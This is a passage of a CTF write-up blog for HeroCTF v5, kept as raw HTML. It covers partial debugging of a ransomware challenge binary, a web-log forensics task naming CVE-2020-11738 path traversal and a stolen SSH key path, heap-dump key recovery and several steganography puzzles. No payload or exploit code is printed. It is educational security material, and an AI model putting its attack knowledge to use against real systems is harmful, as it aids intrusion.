class=\"token punctuation\">(</span><span class=\"token operator\">*</span><span class=\"token 
punctuation\">)</span> <span class=\"token punctuation\">[</span><span class=\"token number\">32</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token operator\">&amp;</span>DAT_140069a00<span class=\"token punctuation\">,</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">func2</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>longlong <span class=\"token operator\">*</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span>local_28<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p><code class=\"language-text\">ZEXT816(0)</code> seems to zero-extend 8 bytes to 16 bytes. 
In other words, the original 8-byte zero becomes a 16-byte zero and is stored in <code class=\"language-text\">local_28</code>.</p>\n<p>Also, <code class=\"language-text\">DAT_140069a00</code> contains a single <code class=\"language-text\">.</code> character.</p>\n<p>The official Writeup identifies the logic very quickly with static analysis, but honestly I felt it was extremely difficult to analyze on my own.</p>\n<p>First, <code class=\"language-text\">local_28</code> is given together with <code class=\"language-text\">.</code> to <code class=\"language-text\">func1</code>, and after that <code class=\"language-text\">local_28</code> is passed to <code class=\"language-text\">func2</code>.</p>\n<p>I had no idea where the actual encryption was being performed, so for the moment I tried running the malware under Noriben.</p>\n<p>It seemed that this malware encrypts files under the folder where the malware is executed.</p>\n<p>That suggests that <code class=\"language-text\">func1</code>, which receives <code class=\"language-text\">.</code>, is probably traversing the current directory.</p>\n<p>From here, I followed the processing with WinDbg.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token operator\">></span> bp Hero+0x571f</code></pre></div>\n<p>I first set a breakpoint on the <code class=\"language-text\">main</code> function and traced the execution, but by the time <code class=\"language-text\">func1</code> finished, no file encryption had occurred.</p>\n<p>In other words, the encryption routine seems to be on the <code class=\"language-text\">func2</code> side.</p>\n<p>Static analysis gave me no clue where the encryption processing was taking place, so I decided to inspect the arguments at each function call with WinDbg.</p>\n<p>However, <code class=\"language-text\">func2</code> makes a huge number of function calls, so I first wrote all function-call arguments to a 
file with the following command.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token operator\">></span> .logopen /t C:<span class=\"token punctuation\">\\</span>Users<span class=\"token punctuation\">\\</span>Public<span class=\"token punctuation\">\\</span>windbg.log\n<span class=\"token operator\">></span> .while <span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span> pc<span class=\"token punctuation\">;</span>.echo rcx<span class=\"token punctuation\">;</span><span class=\"token function\">dc</span> @rcx L10<span class=\"token punctuation\">;</span>.echo rdx<span class=\"token punctuation\">;</span> <span class=\"token function\">dc</span> @rdx L10<span class=\"token punctuation\">;</span>.echo r8<span class=\"token punctuation\">;</span> <span class=\"token function\">dc</span> @r8 L10<span class=\"token punctuation\">;</span>.echo r9<span class=\"token punctuation\">;</span> <span class=\"token function\">dc</span> @r9 L10<span class=\"token punctuation\">;</span>.echo stack<span class=\"token punctuation\">;</span> <span class=\"token function\">dc</span> @rsp L10<span class=\"token punctuation\">;</span>.echo rip<span class=\"token punctuation\">;</span> u rip L1 <span class=\"token punctuation\">}</span></code></pre></div>\n<p>Here <code class=\"language-text\">pc</code> runs until the next <code class=\"language-text\">call</code> instruction, and <code class=\"language-text\">dc</code> dumps the memory pointed to by the four x64 argument registers and by the stack pointer; the <code class=\"language-text\">.while</code> loop repeats this at every call until execution is interrupted.</p>\n<p>This let me dump the arguments at each function call inside <code class=\"language-text\">func2</code>, so I looked through them for a function whose arguments included <code class=\"language-text\">test.txt</code>, which I had placed in the same folder as the malware.</p>\n<p>However, even after staring at Ghidra for about four hours while reading the Writeup, I unfortunately still could not determine exactly where the encryption processing was happening.</p>\n<p>I want to read <a 
href=\"https://github.com/HeroCTF/HeroCTF_v5/tree/main/Reverse/HeroRansom\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">the official writeup</a> and retry it another day.</p>\n<h2 id=\"devcorpforensic\" style=\"position:relative;\">dev.corp(Forensic)</h2>\n<h3 id=\"task1-1\" style=\"position:relative;\">Task1</h3>\n<blockquote>\n<p>The famous company dev.corp was hacked last week. They don’t understand because they have followed the security standards to avoid this kind of situation. 
You are mandated to help them understand the attack.</p>\n<p>For this first step, you’re given the logs of the webserver of the company.</p>\n<p>Could you find :</p>\n<ul>\n<li>The CVE used by the attacker ?</li>\n<li>What is the absolute path of the most sensitive file recovered by the attacker ?</li>\n</ul>\n<p>Format : Hero{CVE-XXXX-XXXX:/etc/passwd}\nAuthor : Worty</p>\n<p>Here is a diagram representing the company’s infrastructure:</p>\n</blockquote>\n<p><span class=\"gatsby-resp-image-wrapper\"><a class=\"gatsby-resp-image-link\" href=\"/static/9ad941ead9bfad3f15eeb091928e4fbf/fd28b/infra.png\" target=\"_blank\" rel=\"noopener\"><img class=\"gatsby-resp-image-image\" src=\"/static/9ad941ead9bfad3f15eeb091928e4fbf/fd28b/infra.png\" alt=\"img\" title=\"img\" loading=\"lazy\" /></a></span></p>\n<p>This felt like a very practical forensic challenge.</p>\n<p>The challenge provided access logs for the web server.</p>\n<p>From these, I needed to identify the vulnerability abused in the attack and the most sensitive file among those stolen.</p>\n<p>Since this was access-log analysis, I used the <code class=\"language-text\">cut</code> and <code class=\"language-text\">uniq</code> commands to list the requested paths and look for suspicious ones.</p>\n<p>As a result, I found requests that looked like path traversal exploiting CVE-2020-11738, and I determined that the accessed <code class=\"language-text\">id_rsa_backup</code> was the most sensitive file.</p>\n<p>In the end, the flag was <code class=\"language-text\">Hero{CVE-2020-11738:/home/webuser/.ssh/id_rsa_backup}</code>.</p>\n<h2 id=\"heapforensic\" style=\"position:relative;\">Heap(Forensic)</h2>\n<blockquote>\n<p>We caught a hacker red-handed while he was encrypting data. Unfortunately we were too late to see what he was trying to hide. We did however manage to get a dump of the java heap.</p>\n<p>Try to find the information he wants to hide from us.</p>\n<p>Format : Hero{}\nAuthor : Thib</p>\n</blockquote>\n<p>The provided challenge file was <code class=\"language-text\">heap.hprof</code>.</p>\n<p>Looking at it with Hexdump and similar tools, it seemed to be a memory dump from something like an Android app.</p>\n<p>The <code class=\"language-text\">.hprof</code> format is used for Java VM heap dumps, but apparently <code class=\"language-text\">.hprof</code> files dumped from Android Studio differ from the standard format, so they first need to be converted with <code class=\"language-text\">hprof-conv</code> before being loaded into MAT (Eclipse Memory Analyzer).</p>\n<p>Reference: <a href=\"https://stackoverflow.com/questions/185893/how-do-i-analyze-a-hprof-file\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">java - How do I analyze a .hprof file? 
- Stack Overflow</a></p>\n<p>Reference: <a href=\"https://qiita.com/cattaka/items/7e81a93aadc2bf616d54\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Quickly capturing hprof files for Android’s Memory Analyzer - Qiita</a></p>\n<p>So I converted the file format with the following command.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">hprof-conv heap.hprof heap-conv.hprof</code></pre></div>\n<p>Next, I launched MemoryAnalyzer.exe and analyzed the converted file.</p>\n<p>On the first screen, I pressed the blue button to create a Histogram.</p>\n<p><span class=\"gatsby-resp-image-wrapper\"><a class=\"gatsby-resp-image-link\" href=\"/static/6f1ee6945dded030b849044a3fe7e84e/2fd48/image-20230517231258813.png\" target=\"_blank\" rel=\"noopener\"><img class=\"gatsby-resp-image-image\" src=\"/static/6f1ee6945dded030b849044a3fe7e84e/2fd48/image-20230517231258813.png\" alt=\"image-20230517231258813\" title=\"image-20230517231258813\" loading=\"lazy\" /></a></span></p>\n<p>Here, the objects in the dump are grouped by class.</p>\n<p>When I listed the classes, I found one with the very suspicious-looking name <code class=\"language-text\">class com.hero.cryptedsecret.AESEncrypt @ 0x131efdf8</code>.</p>\n<p>I right-clicked it and used [List Object] to inspect its <code class=\"language-text\">Incoming References</code> and <code class=\"language-text\">Outgoing References</code>.</p>\n<p>Reference: <a href=\"https://dzone.com/articles/eclipse-mat-incoming-outgoing-references\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Eclipse MAT — Incoming, Outgoing References - DZone</a></p>\n<p>Here, <code class=\"language-text\">Incoming References</code> are the objects that hold references to that object.</p>\n<p>On the other hand, <code class=\"language-text\">Outgoing References</code> are the references held by that object.</p>\n<p>In this case, when I listed the <code class=\"language-text\">Outgoing References</code> held by the <code class=\"language-text\">com.hero.cryptedsecret.AESEncrypt</code> class, I found <code class=\"language-text\">message</code> and <code class=\"language-text\">KEY</code> objects as shown below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 704px; \"\n    >\n      <a\n    
class=\"gatsby-resp-image-link\"\n    href=\"/static/390a245a878ee4ede8aa41d10e54678a/5ebd7/image-20230517231830794.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  ><img class=\"gatsby-resp-image-image\" src=\"/static/390a245a878ee4ede8aa41d10e54678a/5ebd7/image-20230517231830794.png\" alt=\"image-20230517231830794\" title=\"image-20230517231830794\" loading=\"lazy\" /></a>\n    </span></p>\n<p>Since the encryption mode turned out to be ECB, I was able to decrypt the flag using the recovered key and message.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: 
auto; margin-right: auto; max-width: 425px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/40e42676a595547b1d53ec590d8159c8/2fbbf/image-20230517232636030.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 230.83333333333337%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/40e42676a595547b1d53ec590d8159c8/8ac56/image-20230517232636030.webp 240w,\n/static/40e42676a595547b1d53ec590d8159c8/8dc4f/image-20230517232636030.webp 425w\"\n              sizes=\"(max-width: 425px) 100vw, 425px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/40e42676a595547b1d53ec590d8159c8/8ff5a/image-20230517232636030.png 240w,\n/static/40e42676a595547b1d53ec590d8159c8/2fbbf/image-20230517232636030.png 425w\"\n            sizes=\"(max-width: 425px) 100vw, 425px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/40e42676a595547b1d53ec590d8159c8/2fbbf/image-20230517232636030.png\"\n            alt=\"image-20230517232636030\"\n            title=\"image-20230517232636030\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"windows-stands-for-loserforensic\" style=\"position:relative;\"><a href=\"#windows-stands-for-loserforensic\" aria-label=\"windows stands for loserforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path 
fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Windows Stands For Loser(Forensic)</h2>\n<p>I ran out of energy, so I’ll review this one another day…</p>\n<p>Reference: <a href=\"https://github.com/HeroCTF/HeroCTF_v5/tree/main/Forensics/Windows_Stands_For_Loser\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">HeroCTF_v5/Forensics/Windows_Stands_For_Loser at main · HeroCTF/HeroCTF_v5 · GitHub</a></p>\n<h2 id=\"openpirateosint\" style=\"position:relative;\"><a href=\"#openpirateosint\" aria-label=\"openpirateosint permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>OpenPirate(OSINT)</h2>\n<p>This challenge was to access <code class=\"language-text\">hero.pirate</code>.</p>\n<p>The <code class=\"language-text\">pirate</code> top-level domain does not exist in the ICANN root zone; it is one of the TLDs served by the OpenNIC alternative DNS root, so a lookup through an ordinary resolver simply returns NXDOMAIN even though the host exists for OpenNIC users.</p>\n<p>So, following the reference below, I configured an OpenNIC public server as my DNS resolver.</p>\n<p>Reference: <a href=\"https://wiki.archlinux.jp/index.php/%E4%BB%A3%E6%9B%BF_DNS_%E3%82%B5%E3%83%BC%E3%83%93%E3%82%B9\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Alternative DNS services - ArchWiki</a></p>\n<p>After that, I was able to access <code 
class=\"language-text\">hero.pirate</code> and recover the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 852px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/01ce7764acf1156dc3d09b52c080f184/47ff6/image-20230514151624947.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 26.666666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAx0lEQVQY0zWQ/Q5DMBTFPQcpG/6dlUnQbzWrBBvv/zI7Kn5N7705uSf3tgGlJTvoGONITdOkaZrn+e12j6IwugjDEHqWZYSQiCQkTpI4Dl6etm1N3yutldLGmPE9InZdxy5Q28EOwyCFYNIIZYTgQeXNVVU9Lx6eoiioB0pZlqdeeOihUIgBbl3XiJg5uck5t64Ljvs4pZS1FpLW+rdt33WZ53nfNyyIYXAd5nMyNtdKSymt7dHNOT+3RY2PQMSThJRI6EQ/XH82vT8v0T3frAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/01ce7764acf1156dc3d09b52c080f184/8ac56/image-20230514151624947.webp 240w,\n/static/01ce7764acf1156dc3d09b52c080f184/d3be9/image-20230514151624947.webp 480w,\n/static/01ce7764acf1156dc3d09b52c080f184/39392/image-20230514151624947.webp 852w\"\n              sizes=\"(max-width: 852px) 100vw, 852px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/01ce7764acf1156dc3d09b52c080f184/8ff5a/image-20230514151624947.png 240w,\n/static/01ce7764acf1156dc3d09b52c080f184/e85cb/image-20230514151624947.png 480w,\n/static/01ce7764acf1156dc3d09b52c080f184/47ff6/image-20230514151624947.png 852w\"\n            sizes=\"(max-width: 852px) 100vw, 852px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            
src=\"/static/01ce7764acf1156dc3d09b52c080f184/47ff6/image-20230514151624947.png\"\n            alt=\"image-20230514151624947\"\n            title=\"image-20230514151624947\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"pdf-messstego\" style=\"position:relative;\"><a href=\"#pdf-messstego\" aria-label=\"pdf messstego permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>PDF-Mess(Stego)</h2>\n<blockquote>\n<p>This file seems to be a simple copy and paste from wikipedia. 
It would be necessary to dig a little deeper…</p>\n<p>Good luck!</p>\n<p>Format : Hero{}\nAuthor : Thibz</p>\n</blockquote>\n<p>When I dumped the PDF’s objects and streams with <a href=\"https://github.com/dzzie/pdfstreamdumper\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">pdfstreamdumper</a>, I found the following embedded JavaScript.</p>\n<div class=\"gatsby-highlight\" data-language=\"javascript\"><pre class=\"language-javascript\"><code class=\"language-javascript\"><span class=\"token keyword\">const</span> CryptoJS<span class=\"token operator\">=</span><span class=\"token function\">require</span><span class=\"token punctuation\">(</span><span class=\"token string\">'crypto-js'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>key<span class=\"token operator\">=</span><span class=\"token string\">'3d3067e197cf4d0a'</span><span class=\"token punctuation\">,</span>ciphertext<span class=\"token operator\">=</span>CryptoJS<span class=\"token punctuation\">[</span><span class=\"token string\">'AES'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span><span class=\"token string\">'encrypt'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">(</span>message<span class=\"token punctuation\">,</span>key<span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token string\">'toString'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>cipher<span class=\"token operator\">=</span><span class=\"token string\">'U2FsdGVkX1+2k+cHVHn/CMkXGGDmb0DpmShxtTfwNnMr9dU1I6/GQI/iYWEexsod'</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>Because <code class=\"language-text\">key</code> is passed as a string, CryptoJS treats it as a passphrase rather than a raw key: it derives the AES-256 key and CBC IV from the passphrase and a random 8-byte salt with OpenSSL’s EVP_BytesToKey (MD5, one iteration) and emits the OpenSSL <code class=\"language-text\">Salted__</code> container, which is why the base64 ciphertext starts with <code class=\"language-text\">U2FsdGVkX1</code>. Decrypting <code class=\"language-text\">cipher</code> with the same passphrase, using CryptoJS itself or anything that understands the OpenSSL salted format, recovers the flag.</p>\n<h2 id=\"png-gstego\" style=\"position:relative;\"><a href=\"#png-gstego\" aria-label=\"png 
gstego permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>PNG-G(Stego)</h2>\n<blockquote>\n<p>Don’t let appearances fool you.</p>\n<p>Good luck!</p>\n<p>Format : Hero{}\nAuthor : Thibz</p>\n</blockquote>\n<p>The provided challenge file is an image named <code class=\"language-text\">pngg.png</code>.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 506px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/703b6bb6d0b98404056a34769c7029ba/29f4e/image-20230517233603580.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 100%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAYAAACNiR0NAAAACXBIWXMAAAsTAAALEwEAmpwYAAAFgElEQVQ4yx2U2VPb1xmGdeFJxjbgGGMhNoHNEmOxWAgEEQiEFhAIJIGsFQECLAuZzQaxCWR2glmNYuIN141jx4lJcSfLTJu0trGTTMZJ2rrTTNt0xm2mM+1FL/onPP2lF9/MmTlnnvf9znm/I/ru+ff4W6yc93tpNryBvkzGs6/+wN4Xv2f7xs+YDnVzeWGG29ElVid6CTrqGWnSs+Uy0qsrJNSoYsBYSkthGjV5GYj+8fI/9PlsXDjjoUF9imp5Op/9+jG/e/GSX338KT/fnGJtZpybS2Euzw2zciHAXUFgqc2CqzyTcMDL/OA5morSaSzKQvTBu/fwWqqYDw+iU+TiadDz4z//y5//9i+ePnrG1eVJdnd+ycZMmPFuL29Pj/Kb1QV2z3cx1VjKqk3HhrOWCfVJgiU5iLa33sKildNpVVGYFou5UsHTvee8+Mu/2bm/w93ZIN8+2WNrbYX5UJDZoJdo6Bwfz4xxy6nhrYCHrRYTy9X5DBZnI3rv7vvYDCV0u+qRJcdiN6h4vPshf3r6W77cvcPLbQd/vTfM1cVJVqdCrPX5uNRpZ8imp6dByc21JWFvjq7qQprzpYiePPkWm15Bt9vEieQ4+q1l/PjRMi8fLPHD9TN8v2Li8/Ve7i2FWBfucmMuwtW5KSbManqElnfnJ3k4OcJZgaHMSUT0eO87jGWZtDfrSRfHMm5X8fdoK8/XuvnjWis/vGnmSTTEnaVRonNhri9OsTjcy8xpPb1GBfMdNi45ajijO4XzJ4eXL82jzkvAVVOMNOEAK94qXix18fWCj0eTNnaHLXwT7eaTjRHuRteF9qa55TMTaarEXyNnrMPKxZ52OvXFaE5IEAUcBjQFYtz1FaSK47jiLuFZxMXOoIuHQ3Y+Crt4EF3m82iEL1YG2bnQyboQmemWeroMBUz4LLw7PUZnk5aCY/GIFqYj1CqPMdDh4rgkjkVnJQ9H3WwNeHk/5OTxmIW9OT+PZtr5+qKDr2YDXA/aeae/naG6It4cPcfiWTfNZdmUZ4kRXdvcxPQTsFFw+No+Ru0arvba2B5yca3fwU2/gc8ibTy4GOB+uINf9DVxpdXElbNO+gz5XBnrZa7Djrsil3zpYURTkWl0eWK6dHKkkhgG7Vrei3SxO9vG9oCVG4FqPhyxcaunkY1+D5vzM4R9zYwIZa/I5oxRiUOnwKyWIUt9DdFsfxulWYexaYuFVz5Ih7WaaNDC/X4jl7sq2OxSc/u8mWuBBm4PeLg+EuCipxafSYVWnoxaJqYi9ygGeRq5QuxEwy49xcePYFHl/x/oFMCT3jqWO+qZtZey3qrmTq+ZG/56bg+2sjM1wLxNg6syj/LcBIrSYyhI2U9J5iHypILDvmY16sIU3FoZypMS6svyGPJaWOi0Mt4g55JbzapHw7C5lLC9mhvDQcYcRkxCdtVCOvLTYsiV7OeUNJbXkwSH3eYSJizHmGjKQp2fgkOVS6C2hBl3DT5NHn5BKFCn5GzDG4y3WtjsaaHDWIauSEpB2kGOx79K9pFXkSUdIFMcg0hXkIqnOBFnWQoFx8WcVmbRKcx2v/Df+U1FOCoyGG3VMNSupU+oMZ+QP0FQmXNUgMQg3r+PjPhXUKTEIJMILVfkiKnMisdfmkGJNB5PlYwhdzkhb7nw4nkEa6WEXdmEW3OItOcw3qYkWCfjtEJKaUYCybH7OfjKPsoT46hKFyalsTAZQ64EhyKJ06eSaKnMxF0lwauTYio8iirzMDWyQ1iVhwSxJHpMUhxaKdbCVIxZEqQC8ETcARpliWiyBWBxphh5ZjKKtHjqSo/h1ksxFh3BqU6lVsin9oSY+pPxmORH0RaLhYkQSiWsTyZQnp2IPD0BReoRjK8LZ3Mk/A8pYjl4S5clzgAAAABJR
U5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/703b6bb6d0b98404056a34769c7029ba/8ac56/image-20230517233603580.webp 240w,\n/static/703b6bb6d0b98404056a34769c7029ba/d3be9/image-20230517233603580.webp 480w,\n/static/703b6bb6d0b98404056a34769c7029ba/6b97b/image-20230517233603580.webp 506w\"\n              sizes=\"(max-width: 506px) 100vw, 506px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/703b6bb6d0b98404056a34769c7029ba/8ff5a/image-20230517233603580.png 240w,\n/static/703b6bb6d0b98404056a34769c7029ba/e85cb/image-20230517233603580.png 480w,\n/static/703b6bb6d0b98404056a34769c7029ba/29f4e/image-20230517233603580.png 506w\"\n            sizes=\"(max-width: 506px) 100vw, 506px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/703b6bb6d0b98404056a34769c7029ba/29f4e/image-20230517233603580.png\"\n            alt=\"image-20230517233603580\"\n            title=\"image-20230517233603580\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Although the extension is png, when I checked the file with exiftool, [File Type] was reported as APNG.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">ExifTool Version Number         <span class=\"token builtin class-name\">:</span> <span class=\"token number\">12.40</span>\nFile Name                       <span class=\"token builtin class-name\">:</span> pngg.png\nDirectory                       <span class=\"token builtin class-name\">:</span> /home/ubuntu/Hacking/CTF/2023/heroctf/Stego/PNG-G\nFile Size                       <span class=\"token builtin class-name\">:</span> <span class=\"token 
number\">500</span> KiB\nFile Modification Date/Time     <span class=\"token builtin class-name\">:</span> <span class=\"token number\">2023</span>:05:14 00:55:20+09:00\nFile Access Date/Time           <span class=\"token builtin class-name\">:</span> <span class=\"token number\">2023</span>:05:17 <span class=\"token number\">22</span>:09:16+09:00\nFile Inode Change Date/Time     <span class=\"token builtin class-name\">:</span> <span class=\"token number\">2023</span>:05:14 00:55:20+09:00\nFile Permissions                <span class=\"token builtin class-name\">:</span> -rw-r--r--\nFile Type                       <span class=\"token builtin class-name\">:</span> APNG\nFile Type Extension             <span class=\"token builtin class-name\">:</span> png</code></pre></div>\n<p>So this image is animated: an APNG stores its additional frames in fcTL/fdAT chunks that a viewer without APNG support ignores, showing only the default image, which is exactly what the hint about appearances is pointing at.</p>\n<p>I used <a href=\"https://sourceforge.net/projects/apngdis/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">APNG Disassembler download | SourceForge.net</a> to split the APNG file into its individual frames, and one of them contained the flag, as shown below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 506px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f6cbe5847fad49abb24c9f31bf03967a/29f4e/image-20230517233841644.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 101.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f6cbe5847fad49abb24c9f31bf03967a/8ac56/image-20230517233841644.webp 
240w,\n/static/f6cbe5847fad49abb24c9f31bf03967a/d3be9/image-20230517233841644.webp 480w,\n/static/f6cbe5847fad49abb24c9f31bf03967a/6b97b/image-20230517233841644.webp 506w\"\n              sizes=\"(max-width: 506px) 100vw, 506px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f6cbe5847fad49abb24c9f31bf03967a/8ff5a/image-20230517233841644.png 240w,\n/static/f6cbe5847fad49abb24c9f31bf03967a/e85cb/image-20230517233841644.png 480w,\n/static/f6cbe5847fad49abb24c9f31bf03967a/29f4e/image-20230517233841644.png 506w\"\n            sizes=\"(max-width: 506px) 100vw, 506px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f6cbe5847fad49abb24c9f31bf03967a/29f4e/image-20230517233841644.png\"\n            alt=\"image-20230517233841644\"\n            title=\"image-20230517233841644\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"subliminalstego\" style=\"position:relative;\"><a href=\"#subliminalstego\" 